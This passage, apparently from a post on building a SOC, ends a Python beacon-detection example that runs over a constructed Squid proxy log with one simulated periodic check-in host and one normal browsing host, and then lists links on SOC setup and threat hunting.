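    return f"{ts:.3f}    120 {client} TCP_MISS/200 512 {method} {url} - HIER_DIRECT/203.0.113.10 text/plain"


BASE = 1477040400.0   # constructed epoch base for the sample
SAMPLE_LOG = (
    # .77 checks in roughly every 60 s with the same path: beacon
    [_line(BASE + o, "10.1.1.77", "http://cdn-update.example.net/c/ping")
     for o in (0, 60, 121, 180, 241, 300, 360, 421, 480, 540)]
    # .20 browses a site: bursts of assets, long idle stretches, many paths
    + [_line(BASE + o, "10.1.1.20", f"http://www.example.com/{p}")
       for o, p in ((0, ""), (2, "css/site.css"), (3, "js/app.js"), (45, "news"),
                    (46, "img/a.png"), (300, "about"), (301, "css/site.css"), (302, "img/b.png"))]
    + [_line(BASE + 900, "10.1.1.20", "www.example.com:443", "CONNECT")]
    + [_line(BASE + 5, "10.1.1.20", "http://example.org/")]
)

if __name__ == "__main__":
    for pair, stats in beacon_candidates(parse_squid(SAMPLE_LOG)).items():
        print(pair, stats)
```

The distinct_paths count is there for triage: software updaters beacon too, but they tend to fetch a handful of different URLs, while a check-in implant keeps hammering the same one.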

Advice on setting up a SOC, or multiple SOCs, in one organization: http://www.montance.com/mgt517/#/5/7

Threat hunting for SOCs via Raffael Marty‍:

Original Post: https://www.peerlyst.com/posts/how-to-build-and-run-a-soc-for-incident-response-and-enterprise-defensibility-a-collection-of-resources
